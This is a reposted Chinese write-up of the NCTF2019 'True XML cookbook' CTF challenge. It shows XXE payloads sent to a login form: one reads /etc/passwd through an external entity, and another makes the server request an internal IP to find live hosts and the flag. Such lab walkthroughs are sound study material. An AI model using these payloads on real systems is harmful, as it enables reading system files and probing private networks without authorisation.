码上欢乐
相关内容   简体   繁体

[NCTF2019]True XML cookbook

本文转载自  查看原文  2020-05-27 22:08  1151    CTF/ xxe

知识点

  • XXE探测内网

一如既往的登录框

 

抓包,添加外部注入实体,读取/etc/passwd

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>

<user><username>&admin;</username><password>123546</password></user>

 

读取历史操作命令.bash_history失败

读取/etc/hosts文件

 

看到内网有存活的主机,尝试访问

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "http://173.241.204.10">
  ]>

<user><username>&admin;</username><password>123546</password></user>

  

 

在173.241.204.11主机处发现flag

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 [NCTF2019]True XML cookbook [NCTF2019]Fake XML cookbook XXE漏洞学习和利用—[NCTF2019]Fake XML cookbook NCTF2019 Keyboard [NCTF2019]SQLi [NCTF2019]SQLi [NCTF2019]babyRSA [NCTF2019]SQLi 【Yii2-CookBook】JSON 和 XML 输出 web.xml is missing and is set to true
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM